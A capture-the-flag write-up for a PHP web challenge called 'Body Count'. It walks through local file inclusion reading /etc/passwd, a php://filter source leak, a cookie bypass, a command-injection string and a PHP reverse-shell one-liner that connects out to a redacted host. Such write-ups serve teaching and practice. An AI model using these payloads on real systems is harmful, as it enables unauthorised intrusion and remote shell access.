Body Count

Loading up the site, we see file=wc.php. Any time I see something like this I always check for LFI.

http://chall.csivit.com:30202/?file=../../../etc/passwd

So LFI is in play. Let’s use the php filter wrapper and grab the source of the wc.php file.

http://chall.csivit.com:30202/?file=php://filter/convert.base64-encode/resource=wc.php

After decoding the b64, we can get a look at what’s going on under the hood.

So our cookie needs to match the PASSWORD environment variable for us to get any further.

Fortunately, robots.txt has a neat disallow.

Using the same method that we used to get the source of wc, we can get the source of checkpass

There’s the password. Let’s edit our cookie so we can proceed.

Going back to the source of wc.php, we can see the command it’s running, so all we need to do is inject our own command into it.

'; whoami #'

’; to escape and end the previous command, whoami- our command, # to comment out the rest of the command

Command injection is in play. Let’s get a reverse shell.

'; php -r '$sock=fsockopen("REDACTED",4444);exec("/bin/sh -i <&3 >&3 2>&3");' #'

Now that we’re in, browsing around the filesystem I found this directory

And inside that directory is…

cracked hash = csictf

Let’s switch to the ctf user and browse some of these files